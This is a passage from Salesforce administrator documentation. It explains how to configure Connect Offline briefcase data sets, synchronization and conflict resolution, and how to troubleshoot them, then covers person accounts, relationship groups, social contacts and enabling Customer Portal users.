The test statistics in the Test Data Size section do not automatically refresh if you edit the data sets. Click Refresh Data
Size to update the test results.

5. Click Done when you are finished.

Adding Data Sets

To add a data set:

1. In the hierarchy, select Data Sets to create a parent data set, or select an existing data set to create a child data set.
2. Click Add....
3. In the popup window, select the object for the records you want the data set to include. Salesforce lets you create parent

data sets for all custom objects and the following standard objects:

• Accounts
• Contacts
• Events
• Leads
• Opportunities
• Products
• Tasks
• Users

For child data sets, the popup window only lists objects that relate to the selected parent data set.

Note: Salesforce automatically transfers parent records of objects if that type of parent record is anywhere in the
data set, even if the parent object is not connected to the child object in the hierarchy.

4. Click OK. The data set you created appears in the hierarchy.
5. Optionally, use filters to restrict the records that a parent or child data set includes:

a. Use the Filter by Record Ownership options to configure Salesforce to automatically synchronize records based on the
owner of the record. The possible options are:

• All Records: Salesforce automatically synchronizes all records the user can access.
• User's Records: Salesforce automatically synchronizes all records the user owns.
• User's Team's Records: Salesforce automatically synchronizes all records owned by the user and the user's

subordinates in the role hierarchy.
• User's Account Team's Records: Salesforce automatically synchronizes accounts for which the user is an

account team member, but does not include accounts owned by the user.
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• User's Opportunity Team's Records: Salesforce automatically synchronizes opportunities for which the
user is an opportunity team member, but does not include opportunities owned by the user.

• None (Search Only): Salesforce does not automatically synchronize any records for this data set.

Salesforce only displays options that relate to the selected data set. For example, selecting an account data set displays
the User's Account Team's Records option, while selecting an opportunity data set displays the User's
Opportunity Team's Records option.

If your offline needs for an object require a combination of the available record ownership filters, you can add the same
object data set up to four times on the same hierarchy level. For example, a sales manager might want to synchronize
his opportunities, opportunities owned by his subordinates, and opportunities for which he is an opportunity team
member. In this case, you would add an opportunity data set and select User's Team's Records, then add a second
opportunity data set at the same level in the hierarchy and select User's Opportunity Team's Records. Note
that objects with only one ownership filter option cannot be added multiple times at the same level of the hierarchy.

b. Set the filter criteria to automatically synchronize only records that meet specific criteria in addition to the Filter by
Record Ownership option you selected. For example, you can set the filter to only include opportunity records with
amounts greater than $50,000, or contact records with the title “Buyer.” Several $User global variables are available in
offline configuration filters.

Click Add Filter Logic to change the default AND relationship between each filter.

c. To prevent a single data set from consuming a large amount of memory, select the second radio button under Set Max
Record Limit and enter the maximum number of records this data set can transfer to a briefcase. Use the Order By
and Sort drop-down lists to specify which records are synchronized if the number of records available is higher than
the limit you set.

If the limit is reached, Salesforce synchronizes records in accordance with the Order By and Sort settings. For example,
if the settings are Last Modified Date and Descending, Salesforce transfers the most recently modified records and
removes the same number of records that were least recently modified.

If you selected the None (Search Only) Filter by Record Ownership option, the limit you set does not apply because
no records are automatically synchronized.

Tip:  Do not use Set Max Record Limit in place of filters. Only use Set Max Record Limit as a safety
mechanism, and use filters as the primary means of limiting the number of records in the briefcase. This ensures
that your Connect Offline users receive the correct records.

6. Click Done when you are finished.

Notes on Data Sets

• Connect Offline users can view opportunity contact roles in their briefcases. To add contact roles to a briefcase, include
the contact data set as a child of the opportunity data set in your briefcase configuration.

• Recurring events are not available in Connect Offline.
• Each data set can synchronize a maximum of 5,000 records.
• If you add a custom object containing a custom tab icon to a data set, the look and feel of the custom tab defaults to the

Star tab style in Connect Offline.
• Connect Offline does not support the Force.com app menu. If your briefcase configuration synchronizes custom objects,

all the tabs for those custom objects are visible when you log into Connect Offline, even if they belong to different apps.

See Also:
Managing Connect Offline Briefcase Configurations
Sample Offline Data Sets
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Manually Adding Accounts to Your Connect Offline
Briefcase

Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

User Permissions Needed

“View” on accountsTo manually add accounts to Connect Offline:

If an administrator does not assign a briefcase configuration to your profile, you can click the Include Offline button on any
account detail page to manually add the account to your Connect Offline briefcase. The next time you synchronize your
briefcase, Salesforce transfers the account to Connect Offline, as well as:

• All contacts associated with the account, if you have at least read access to the contacts

• All opportunities associated with the account, if you have at least read access to the opportunities. This includes opportunities
that have been shared with you, that are owned by users below you in the role hierarchy, or where you are on the opportunity
team. Products and schedules for downloaded opportunities are also included.

• All the custom objects that have a master-detail relationship with the account

• Tasks and events related to the included account, according to these guidelines:

◊ Events dated this month, the past two months, or up to 24 months in the future

◊ All open tasks up to 24 months in the future

◊ Closed tasks with a due date this month, the past two months, or 24 months in the future

◊ Tasks with a blank due date that were created or modified this month or within the past two months

You can manually add up to 100 accounts in your briefcase.

Note:  The Include Offline button automatically appears on the account detail page for all Connect Offline users
assigned to profiles without that do not have briefcase configurations. You do not have to add the Include Offline
button to account page layouts.

Removing Manually-Added Accounts from Connect Offline

You can remove manually added accounts from your briefcase as follows:

1. From Setup, click Desktop Integration > Connect Offline.
2. Click Briefcase Setup.
3. Select the checkbox next to the account to remove.
4. Click Remove from Briefcase.

The next time you synchronize your briefcase, Salesforce removes the account from your briefcase, as well as its related contacts,
opportunities, and activities, and custom object records that have a master-detail relationship with the account.
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What is Your Default Connect Offline Briefcase Contents?
Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

If your user profile does not have an associated briefcase configuration, your default briefcase automatically includes the
following:

• All of your contacts (including your private contacts) and read access to related accounts or opportunities

• All contacts associated with the accounts in your briefcase, if you have at least read access to the contacts

• All opportunities associated with the accounts in your briefcase that are either open or have a close date in the current
month, the past two months, or up to 24 months in the future if you have at least read access to the opportunities. This
includes opportunities that have been shared with you, that are owned by users below you in the role hierarchy, or where
you are on the opportunity team. Products and schedules for downloaded opportunities are also included.

• All of your leads up to a maximum of 5000

• All custom object records that have a master-detail relationship with any account, contact, or opportunity that is included
in your briefcase

• Your tasks and events, as well as tasks and events related to the accounts in your briefcase, according to these guidelines:

◊ Events dated the past two months or up to 24 months in the future

◊ All of your open tasks up to 24 months in the future

◊ Closed tasks with a due date the past two months or up to 24 months in the future

◊ Tasks with a blank due date that were created or modified this month or within the past two months

Note:  For tasks and events that are related to custom objects not available offline, the Related To field on the
activity indicates that the record is not available in Connect Offline.

If your user profile does not have an associated briefcase configuration, your default briefcase also includes all accounts associated
with opportunities you own; however, you can change the account selection in your briefcase to include one of the following
options instead:

• Accounts that you manually include

• Accounts related to the activities in your briefcase

• All your accounts

To edit your account selections, edit Briefcase Setup.

See Also:
Installing Connect Offline
Working with Connect Offline
Troubleshooting Connect Offline
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Changing Your Connect Offline Briefcase Account Selection

Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

If an administrator does not assign a briefcase configuration to your profile, your briefcase contains the default briefcase
contents, which includes accounts that are associated with opportunities you own, accounts that you manually include, and
accounts related to your contacts. To change the selection of accounts in your Connect Offline briefcase:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left pane, select one of the following:

• If you clicked Setup, select Desktop Integration > Connect Offline.
• If you clicked My Settings, select Desktop Add-Ons > Connect Offline.

.
3. Click Briefcase Setup.
4. Click Edit next to Briefcase Settings.
5. Choose one of the following options to specify the accounts you want to include in your briefcase:

• Manually selected — Up to 100 accounts that you manually include by clicking the Include Offline button on the
account detail page, and accounts related to your contacts.

• Opportunity-based briefcase — Up to 5000 accounts that are associated with opportunities you own (in addition to
accounts that you manually include and accounts related to your contacts). The following restrictions apply:

◊ You must have at least read access to the account.
◊ The opportunity must be open or have a close date in the past two months or up to 24 months in the future.

Opportunity-based briefcase is the default briefcase configuration.
• Activity-based briefcase — Up to 5000 accounts related to the activities in your briefcase (in addition to accounts that

you manually include and accounts related to your contacts).
• All my accounts — Up to 5000 accounts you own or where you are on the account team (in addition to accounts that

you manually include and accounts related to your contacts).

6. Click Save.

Important:  If an administrator assigns a briefcase configuration to your profile after you change the selection of
accounts in your briefcase, the assigned briefcase configuration overrides your briefcase account selection the next
time you synchronize Connect Offline.

See Also:
Logging in to Connect Offline
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Synchronizing Your Briefcase
Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

When using Connect Offline with an Internet connection, you can synchronize your briefcase with Salesforce. During
synchronization, Connect Offline updates Salesforce to reflect any changes you made to your briefcase records while offline.
Connect Offline also updates your briefcase records to reflect any changes in Salesforce since your last synchronization. This
ensures that both Salesforce and Connect Offline have the most current records.

Your briefcase automatically synchronizes the first time you log into Connect Offline. When you are using Connect Offline
with an Internet connection, you can synchronize your briefcase anytime by clicking Synchronize Briefcase in the upper right
corner of the browser window.

Data conflicts can occur during synchronization if a user modified an online record that you also modified offline. If updates
to a record in your briefcase conflict with updates to a record in Salesforce, Connect Offline displays the Conflict Resolution
tool, which allows you to easily resolve the conflicts. If you do not want to resolve the conflicts at that time, click Cancel to
exit the Conflict Resolution tool. You can return to the Conflict Resolution tool later by clicking the link in the Errors section
of the Connect Offline Home tab.

Emptying Your Briefcase

The Empty Briefcase link in the upper right corner of the browser window resets Connect Offline to its initial state.

Warning:  If you click the Empty Briefcase link, Connect Offline deletes all of your briefcase files and settings. Only
empty your briefcase if you change the time zone on your computer or if your administrator requests you to do so.
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Resolving Connect Offline Conflicts

Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

User Permissions Needed

“Read” on the appropriate type of record such as accounts,
contacts, or opportunities

To view records in Connect Offline:

“Create,” “Edit,” or “Delete” on the appropriate type of record
such as accounts, contacts, or opportunities

To update records in Connect Offline:

When you synchronize, data conflicts occur if a user modified the same record in Salesforce that you modified in Connect
Offline. For example, a conflict occurs if you change a contact’s phone number in Connect Offline and another user changes
that contact’s address in Salesforce before you synchronize.

When a conflict occurs, Connect Offline displays a conflict resolution tool that enables you to resolve the conflict by identifying
the most recent and correct values. The left side of the window displays a list of the records that have data conflicts, while the
right side of the dialog box displays the fields that have conflicting data for the record you select in the left side.

To use the conflict resolution tool:

1. In the left pane, use the drop-down list to choose whether to display records in a tree or list view, then choose the record
that you want to resolve.

2. In the right pane, use the drop-down list to choose whether to display all fields on the record or only those that have
conflicting data, then select the radio button next to the correct value.

3. If necessary, click the pencil icon ( ) and manually enter the value you want to save.

Note:  The pencil icon is not available for read-only fields on some objects, such as products on opportunities.

4. Repeat these steps for each record listed in the left pane. When you have selected a value to resolve the conflict, the status
of the record in the left pane displays a green check.

5. Click Submit when you have finished making selections for all records in conflict.

When working with the conflict resolution tool, note the following:

• If you choose not to resolve your data conflicts at this time, click Cancel. You can continue to work in Connect Offline,
but the conflict resolution tool displays whenever you synchronize your data.

• Connect Offline lets you enter values that violate validation rules; however, such validation rule violations appear as data
conflicts in the conflict resolution tool.

The conflict resolution tool displays only one violation at a time. If a record violates multiple validation rules, resolve and
synchronize each violation separately.

• The field values on some objects, such as products on opportunities, are read only in the conflict resolution tool; however,
you can change these values as follows:
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1. Switch to the tree view in the left pane.
2. Select the deepest branch after expanding all the branches.
3. Choose the Your Values radio buton to save the Connect Offline values, or the Salesforce Values radio button

to save the ones on the server instead. The values of the read-only fields change accordingly.
4. Click Submit.

If you click Submit without choosing an option, Connect Offline stores the value on the client for any read-only values
in conflict resolution.

Working with Connect Offline
Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

User Permissions Needed

“Read” on the appropriate type of record such as accounts,
contacts, or opportunities

To view records in Connect Offline:

“Create,” “Edit,” or “Delete” on the appropriate type of record
such as accounts, contacts, or opportunities

To update records in Connect Offline:

The following tabs and features are available in Connect Offline. The tabs you see may differ if your administrator renames
any Salesforce standard tab names or adds custom objects to your briefcase configuration.

Home Tab

• View, create, modify, or delete your events and tasks except multi-person events
• Update or empty your briefcase contents
• Synchronize, search, and view recent items in the sidebar
• Expand the Briefcase Info section to see the number of records you have in Connect Offline for each object, and the

number of records that you have modified since your last synchronization.

Note:  The list of modified records in Briefcase Info does not include deleted records. Also, search results do not
include long text area fields like account Description.

• Click the icons below the calendar to display different views of activities
• To launch the Conflict Resolution tool, click the “You have conflicts to resolve” link when it displays in the sidebar.

Accounts Tab

• View your recent accounts on the accounts home page
• Select a standard list view to list the offline accounts
• View, create, modify, or delete accounts
• View, create, modify, or delete person accounts. This feature is available in Connect Offline version 3.5.2.13 or later.
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• View, create, modify, or delete custom objects associated with offline accounts
• Link contacts, opportunities, and activities to offline accounts
• Use your organization’s record types, dynamic page layouts, field-level security, and translated values (as defined in the

Translation Workbench)
• Update records to which you have edit access. Your Briefcase may include some records that are read only depending on

the records’ sharing settings.

Relationship Groups Tab

• Track the familial and professional roles of different relationship group members
• Assign primary and secondary designations to the two most important members of a relationship group
• View roll-up related lists of all activities for the members of a relationship group
• View roll-up related lists of the custom objects that are related to the accounts in a relationship group

Note: This feature is available in Connect Offline version 3.5.2.13 or later. Related lists on the relationship group
detail page are not available in Connect Offline.

Contacts Tab

• View your recent contacts on the contacts home page
• Select a standard list view to list the offline contacts
• View, create, modify, clone, or delete contacts
• View, create, modify, or delete custom objects associated with offline contacts
• Link activities to offline contacts
• Use your organization’s record types, dynamic page layouts, field-level security, and translated values (as defined in the

Translation Workbench)
• Update records to which you have edit access. Your briefcase may include some records that are read only depending on

the records’ sharing settings.

Opportunities Tab

• View your recent opportunities on the opportunities home page
• Select a standard list view to list the offline opportunities
• View, create, modify, clone or delete opportunities
• View, create, modify, or delete custom objects associated with offline opportunities
• Associate activities and contact roles to offline opportunities
• Add and update contact roles, products, and schedules, and change the price book for an opportunity
• Use your organization’s record types, dynamic page layouts, field-level security, and translated values (as defined in the

Translation Workbench)
• Update records to which you have edit access. Your briefcase may include some records that are read only depending on

the records’ sharing settings.

Leads Tab

• View your recent leads on the leads home page
• Select a standard list view to list the offline leads
• View, create, modify, or delete leads depending on sharing settings
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Note:  Changes made to leads in Connect Offline do not trigger assignment rules.

• Link activities to offline leads
• Use record types, dynamic page layouts, field-level security, and translated values (as defined in the Translation Workbench)

Note:  Leads and custom object records are only available in Connect Offline 2.0 and later, which is indicated by the
briefcase icon  you use to launch the application.

Notes on Working with Connect Offline

Consider the following when using Connect Offline:

• Multi-person events are visible in Connect Offline but you can't create or edit them. If you have been invited to an event,
but are not the organizer, you can'tmodify or delete that event offline.

• Automatically generated fields such as formula fields and auto-number fields are not available in Connect Offline.
• Related lists in Connect Offline do not display lookup fields.

See Also:
What is Your Default Connect Offline Briefcase Contents?
Logging in to Connect Offline
Troubleshooting Connect Offline

Troubleshooting Connect Offline
Available in: Enterprise, Unlimited, and Developer Editions

Available for an additional cost in: Professional Edition

Review the following common situations and solutions to troubleshoot Connect Offline issues.

Activities

Unable to edit the record associated with an activity offline
While you may be able to change the record associated with a task or event in Salesforce, the Related To field on an
activity is only available in Connect Offline when the related record is available offline. For example, if an event is
associated with an account that is not in your Briefcase, you will not be able to change the account on the event using
Connect Offline.

Visible in Self-Service field is not available offline
While you may see this field in your activity page layouts using Salesforce, it is not visible from Connect Offline because
the field indicates if an activity is associated with a case and cases are not available in Connect Offline.

Unable to update group events in Connect Offline
Multi-person events are visible in Connect Offline but you can't create or edit them. If you have been invited to an event,
but are not the organizer, you can'tmodify or delete that event offline.
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Briefcase Contents

Unable to edit some records in my briefcase
Depending on your briefcase settings, records are read only if they are available offline only because they are associated
with records that are included offline due to your briefcase settings. For example, if you have selected an opportunity-based
briefcase, some accounts will be read only offline even though they are not related to an opportunity, but because they
are related to a contact in your briefcase.

Briefcase exceeds limit
Read only records that are included by association with other records in your briefcase do not count toward your limits.
For example, the maximum number of accounts you can include is 5000 but your briefcase may contain 5200 if you have
200 accounts included because they are related to other records in your briefcase.

Browsers

Windows XP SP2 displays a warning banner in Connect Offline
To prevent the warning banner from displaying, modify your Internet Explorer settings as follows:
1. Launch Internet Explorer.
2. Click the Tools menu and choose Internet Options.
3. Select the Advanced tab.
4. Locate the Security section.
5. Enable Allow active content to run in files on My Computer.
6. Click Apply.
7. Click OK.

Unable to download and install Connect Offline using Firefox
Although other browsers are supported in Salesforce, you must use Internet Explorer to download and install Connect
Offline.

Receiving error that says “A connection with Salesforce could not be established to update your Connect Offline.”
This message can appear in the following scenarios:
• Your computer is configured to use a proxy server to connect to the Internet that requires authentication. This

connection is made automatically using Single Sign-On or another manner to authenticate where you do not have
to enter a username or password to connect to the Internet.

• Your computer is behind a firewall
• Your computer is actively running antivirus software

Conflict Resolution

Unable to choose fields in conflict resolution
The field values on some objects, such as products on opportunities, are read only in the conflict resolution tool; however,
you can change these values as follows:
1. Switch to the tree view in the left pane.
2. Select the deepest branch after expanding all the branches.
3. Choose the Your Values radio buton to save the Connect Offline values, or the Salesforce Values radio

button to save the ones on the server instead. The values of the read-only fields change accordingly.
4. Click Submit.

If you click Submit without choosing an option, Connect Offline stores the value on the client for any read-only
values in conflict resolution.
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Conflict resolution prompts me to create a new record or retry
Your sharing settings may have changed. If you have access to perform the action, click Retry. Otherwise, create a new
record in Connect Offline.

Cannot change value of dependent picklist in conflict resolution tool
When resolving conflicts for a dependent picklist field, you cannot change the picklist value of the conflicting field. To
resolve these types of conflicts, select whether to apply the Salesforce value or the Connect Offline value.

Note:  In offline mode, if a dependent picklist's controlling field is hidden by field-level security, the information
icon for the dependent picklist displays the controlling field’s API name rather than the label name.

Fields

Unable to see lookup fields in Connect Offline related lists
Related lists in Connect Offline do not display lookup fields.

Unable to see custom formula fields and auto-numbers in Connect Offline
Automatically generated fields such as formula fields and auto-number fields are not available in Connect Offline.

Auto-number fields do not generate in Connect Offline
When you create a record in Connect Offline that increments an auto-number field, Connect Offline displays a label
for that field while you are using Connect Offline. When you synchronize, Salesforce inserts the next unique number
in the field.

Home Tab

Record count is wrong in Home tab list of modified records
In the sidebar, the list of modified records in briefcase Info does not include deleted records.

Installation

What gets installed?
Connect Offline installs SForceDB.exe, which runs continuously in the background and hosts the Connect Offline
database.

Unable to install Connect Offline
Connect Offline requires Salesforce to install components that edit the registry on your computer. If your organization
imposes security that prevents you from editing the registry, log in as the administrator of your machine before installing
these components or contact your IT department for assistance.

Can I do mass deployments of Connect Offline?
Yes, you can perform system-wide deployments.

How can I tell what Connect Offline version my users have?
Each user's Connect Offline version is listed in the Login History.
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Leads

Unable to see leads in Connect Offline
Leads are only available in Connect Offline 2.0 and later. If you are using Connect Offline 2.0 or later, you will launch
the application using this icon: . To upgrade Connect Offline:
1. Synchronize your data in Connect Offline.
2. Optionally, remove the previous installation of Connect Offline using Add/Remove Programs in the Windows

Control Panel.
3. Install Connect Offline. by going to the Connect Offline page in your personal settings.
4. Synchronize your data in Connect Offline.

Check to make sure you have the appropriate user permissions to view leads.

Lead assignment rules do not appear to be working
Leads created in Connect Offline will not be automatically assigned based on lead assignment rules. Once connected to
Salesforce again, assign them by doing a mass transfer of records.

Multicurrency Display Differences

Opportunity amounts display a fractional difference
If your organization has enabled multicurrency, and the currency used for an opportunity is different from the corporate
currency, a small display difference may be observed. The converted amount you see in the offline opportunity detail
page may be off by a cent or two as compared to the same page in the Salesforce application. There is no error in the
actual stored value.

Relationship Groups

Unable to see the Relationship Groups tab in Connect Offline
The Relationship Groups tab is only available if the Relationship Groups AppExchange package is installed in the
Salesforce organization with which you synchronize Connect Offline.

Search

Search results are missing fields
Search results do not include long text area fields such as account Description.

Timeouts, Timestamps, and Time Zones

The timestamps of files updated in Connect Offline do not appear as expected
For records that you create or update in Connect Offline, the Created By and Modified By fields reflect the time
on your PC, even after synchronization.

Activities that you create in Connect Offline reflect the time you enter and the time zone of your PC. During
synchronization, Salesforce converts the activity times to the time zone set in your Salesforce personal information.

If you change the time zone on your computer, empty and synchronize your briefcase to reflect the change in Connect
Offline.

Connect Offline times out when synchronizing large data sets
Edit the HttpTimeout registry setting in HKEY_LOCAL_MACHINE\SOFTWARE\salesforce.com\Offline2. The
default is 360 seconds.
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Editing Stay-in-Touch Settings
Available in: All Editions except for Database.com

To set your preferences for requesting contact information updates:

Note:  If your organization uses person accounts, person accounts are also affected by these settings. For more
information, see What is a Person Account? on page 755.

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left side of the page, click Email > My Stay-in-Touch Settings.
3. Choose Yes for Automatic Bcc to receive copies of your sent Stay-in-Touch emails. This option is only available if your

organization has not enabled compliance BCC emails.
4. Enable the reminder if you would like to be prompted to send a Stay-in-Touch request whenever you save a new contact.
5. Enter a default subject for the email.
6. In the note area, enter a message to the recipient.
7. In the signature area, enter a signature with your contact information.
8. Use the merge fields area at the top of the page to display available merge field values, which you can copy and paste into

the subject, note, or signature boxes as needed.
9. Click Save.
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Welcome, Salesforce Administrators
Use this documentation set to get Salesforce and its features configured, so your users can become successful selling to their
customers using Salesforce. You’ll find that this documentation goes straight into the tasks you need to complete, based on
your organization’s needs. This documentation, however, doesn’t include feature-specific concepts. For those, you can refer
to the documentation set for users, Sell to Your Customers.

We hope these two sets of documentation provide the complete content you need to get your users up and running with
Salesforce. If you need further support, contact salesforce.com Customer Support.

ADMINISTERING PEOPLE AND ORGANIZATIONS THAT USERS
SELL TO

ADMINISTERING ACCOUNTS

Enabling Person Accounts
Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable person accounts:

Note: Person accounts are not enabled by default in Salesforce. To quickly verify whether your organization uses
person accounts, see if you have an option to select Person Account as the record type when you create a new account.
To request person accounts, check with your administrator.

Before you begin, make sure to:

• Create at least one record type for accounts.
• Grant read permission on contacts for profiles that have read permission on accounts.

SET UP AND MAINTAIN SALES TOOLS
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• Ensure that the contact sharing organization-wide default is set to “Controlled by Parent.”

Once you complete the preliminary steps, contact salesforce.com to enable person accounts and then:

1. From Setup, click Customize > Accounts > Person Accounts.
2. Assign person account record types to profiles that require person accounts.

Note: Person accounts count against both account and contact storage because the API considers each person account
to consist of one account as well as one contact. Additional storage might be necessary when you implement person
accounts, so you should review your storage usage.

Enabling person accounts is permanent and cannot be reverted. If you are an existing customer, we recommend
creating a sandbox to preview how person accounts will affect your organization.

See Also:
Accounts Overview
Implementation guide: Implementing Person Accounts
What is a Person Account?

ADMINISTERING RELATIONSHIP GROUPS

Installing and Implementing Relationship Groups
Available in: Salesforce for Wealth Management

User Permissions Needed

“Download AppExchange Packages”To install apps:

“Customize Application”To configure and deploy installed apps:

Obtaining the Relationship Groups Custom App

The relationship groups custom app comes preinstalled in most Salesforce for Wealth Management organizations. If your
Salesforce for Wealth Management organization does not have the relationship groups custom app, contact salesforce.com to
request it.

Verifying the Installation of the Relationship Groups Custom App

If the relationship groups custom app has been installed in your organization, the Relationship Groups option displays in the
Force.com app menu.

In addition, administrators can use the following procedure to verify that the relationship groups custom app was successfully
installed:
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1. From Setup, click Create > Apps and verify that the relationship groups custom app is present and has the Managed
- Installed icon.

2. From Setup, click Create > Objects and verify that the relationship group and relationship group member objects are
present and each has the Managed - Installed icon.

Configuring the Relationship Groups Custom App

Perform the following implementation tasks to configure the custom app. If the relationship groups custom app came
pre-installed with Salesforce for Wealth Management, some of these configurations may already be set in your organization.

Customizing Account Page Layouts
From Setup, click Customize > Accounts > Page Layouts, and remove the following related lists from the appropriate
account page layouts:
• Relationship Groups (Primary Account)
• Relationship Groups (Secondary Account)

Customizing Person Account Page Layouts
From Setup, click Customize > Accounts > Person Accounts > Page Layouts, and edit the appropriate accountperson
account page layouts:
1. In the Related List Section, drag and drop to edit the following related lists:

• Add Relationship Group Members
• Remove Relationship Groups (Primary Account)
• Remove Relationship Groups (Secondary Account)

2. Edit the Relationship Group Members related list as follows:

• At minimum, include the following fields: Relationship Group, Role, Priority, Include in Roll-Up

• Remove the standard New button
• Add the Add Account to Relationship Group button

Setting Context-Sensitive Help for Relationship Groups
By default, the Help for this Page links on relationship group pages open help content about custom objects in general.
To redirect those links to help topics that specifically describe relationship groups:
1. From Setup, click Create > Objects.
2. Click Relationship Group to open its custom object definition.
3. In the Custom Object Definition Detail section, click Edit.
4. For Context-Sensitive Help Setting, choose Open a window using a custom s-control.
5. For Custom S-Control, choose Relationship Groups Help.
6. Click Save.

Note:  Repeat this procedure for the Relationship Group Member custom object. This sets an appropriate
context-sensitive destination for the help links on the Relationship Group Member related lists.

Overriding Standard Relationship Group Buttons
To customize the buttons on the relationship group detail page:
1. From Setup, click Create > Objects.
2. Click Relationship Group to open its custom object definition.
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3. In the Standard Buttons and Links section, click Override next to New and replace that button with the
NewHousehold s-control.

Customizing Relationship Group Search Layouts
To customize the search layouts for relationship groups:
1. From Setup, click Create > Objects.
2. Click Relationship Group to open its custom object definition.
3. In the Search layouts section, click Edit to modify the appropriate search layout. At minimum, we recommend setting

the following columns for search results:

• Relationship Group Name
• Primary Account
• Secondary Account
• Last Modified By

Customizing Relationship Group Page Layouts
To customize the layout of the relationship group detail page, from Setup, click Create > Objects, then click Relationship
Group to open its custom object definition, then click Edit next to the appropriate page layout name. Edit the page
layout as follows:
1. Remove the Clone button from the detail page.
2. Edit the Open Activities related list as follows:

• Remove the standard New Task and New Event buttons
• Add the custom New Task and New Event buttons

3. Edit the Activity History related list as follows:

• Remove the standard Log a Call. Mail Merge. Send an Email, Request Update. and View All buttons
• Add the custom Log a Call, Mail Merge, and Send an Email buttons

4. In the Relationship Group Members related list, include the following fields, at minimum:

• Relationship Group

• Role

• Priority

• Include in Roll-Up

Overriding Standard Relationship Group Member Buttons
To customize the buttons on the relationship group member detail page:
1. From Setup, click Create > Objects.
2. Click Relationship Group Member to open its custom object definition.
3. In the Standard Buttons and Links section, click Override next toNew and replace it with Edit buttons with the

Edit Household Members s-control.

After configuring the relationship groups custom app, verify that a Relationship Groups option displays in the Force.com app
menu.
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Note:

• In some cases, the custom app and its custom objects may have the label “Households” instead of “Relationship
Groups” throughout. Whatever the labels are, they cannot be changed because the app is a managed package.

• Installing the Relationship Groups custom app may cause an error if your organization has fewer than 21 account
records. You may ignore this error and continue the installation process.

• For all installations, the API names of the custom objects begin with the namespace prefix household__.
• The Relationship Group Member object is only supported in API version 11.0 and later.

See Also:
Relationship Groups Overview
Creating Relationship Groups

Testing the Relationship Groups Package
Available in: Salesforce for Wealth Management

User Permissions Needed

“Download AppExchange Packages”To install apps:

“Customize Application”To configure and deploy installed apps:

The relationship groups managed package provides unit tests that run when you install the package in your sandbox or
production organization. In some cases, a component like an Apex trigger, validation rule, workflow rule, or custom field
prevents the unit tests from completing successfully.

If the unit tests fail, do the following before running the tests again:

• Install the latest version of the relationship groups managed package. The functionality of the new version is the same as
the older version except the unit tests have been enhanced. Contact salesforce.com and request the latest version of the
package (not available on the AppExchange).

• Deactivate components that prevent account, household, or household member objects from being edited or deleted. Apex
triggers are a common cause of failed unit tests.

To ensure the relationship groups package runs successfully in your organization, the unit tests attempt to edit and delete
some account, household, and household member objects. These tests do not permanently modify your organization's data.
If a platform element prevents these objects from being edited or deleted, the unit tests fail.

See Also:
Relationship Groups Overview
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CONFIGURING CONTACTS

Enabling and Configuring Social Accounts and Contacts

Business accounts available in: All Editions except Database.com

Person accounts available in: Enterprise, Unlimited, and Developer Editions

Contacts available in: All Editions except Database.com

Leads available in: Group, Professional, Enterprise, Unlimited, and Developer Editions
Data.com Clean available in: Developer, Enterprise, and Professional editions

Data.com Clean available for an additional cost in: Unlimited Edition

Social Key available in: in: Developer, Enterprise, and Professional, and Unlimited editions

User Permissions Needed

“Customize Application”To enable, configure, or disable Social Accounts and Contacts:

Enable Social Accounts and Contacts so your users can keep up to date on their accounts', contacts', and leads' social
information—right within Salesforce. After you enable the feature, select the networks your organization can use. Your
organization’s users can also configure Social Accounts and Contacts for their own use: they can turn the feature on and off
and select the networks they want.

If your organization also uses Data.com Social Key (Beta in Summer ’13), enable that feature to get your contacts’ and leads’
social handles automatically when you run Clean jobs.

Note: The Social Accounts and Contacts feature is enabled by default for organizations created after the Spring ’12
release. If your organization was created before that, you need to enable the feature yourself.

1. From Setup, click Customize > Social Accounts and Contacts > Settings.
2. Select Enable Social Accounts and Contacts.
3. Select the social networks that your organization can use. By default, all social networks are selected.
4. Click Save.
5. Let your users know they can configure Social Accounts and Contacts for their individual use.

Enable Social Key if your organization will use it.

See Also:
Social Accounts, Contacts, and Leads Overview
Contacts Overview
Defining Your Social Accounts and Contacts User Settings
Enabling Social Key
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ADMINISTERING ENHANCED CONTACTS

Enabling the Customer Portal for Contacts and Person
Accounts

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on the account associated with the Customer Portal
user

AND

“Edit Self-Service Users”

To enable Customer Portal users, or to log in as a portal user:

To allow a customer to access your Salesforce Customer Portal, you must enable the customer’s contact or person account
record as a Customer Portal user. You can either disable or deactivate Customer Portal users at any time.

To enable the Customer Portal for a customer:

1. Click Manage External User and choose Enable Customer User from the drop-down button on the contact or person
account detail page.

2. Verify the general information and locale settings, and enter any missing information. Note that the customer’s Username
defaults to his or her Email.

3. Select a portal user license. The user license you choose determines the permission sets, user profile, and role hierarchy
options you can select for the Customer Portal user. See Customer Portal User Licenses on page 1967.

4. Select Generate new password and notify user immediately to email a Customer Portal username and
password to the customer.

If your organization uses multiple Customer Portals, a portal user can access all the Customer Portals assigned to his or
her profile with one username and password. See Creating Multiple Customer Portals on page 1935.

5. Click Save.

To troubleshoot or confirm the portal configuration, on the contact detail page, click Manage External User and choose Log
in to Portal as User. This opens a new browser window and logs you into the portal as the partner user.

Tips on Enabling the Customer Portal for Contacts

Consider the following when enabling the Customer Portal for contacts:

• To view or edit an enabled contact’s access to your Customer Portal, on the contact detail page, click Manage External
User and choose View Customer User.

• You cannot enable the contact for the Customer Portal unless the owner of the contact’s account is associated with a role
in your organization.
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• The first time you enable a contact for the Customer Portal on an account, you cannot assign the contact to a portal role.
The contact is automatically assigned to the Customer User role, which includes the name of the contact’s account. You
can update contact’s portal role later.

This behavior doesn’t apply to high-volume portal users because they don’t have roles and aren’t included in the role
hierarchy.

• A contact can be either a partner or Customer Portal user, but not both. If a user is a partner user and a Customer Portal
user, then you need to create two contact records for the user so that he or she can have a separate username and password
for each portal.

However, a contact can be a Self-Service user as well as a partner or Customer Portal user. Any data created or owned by
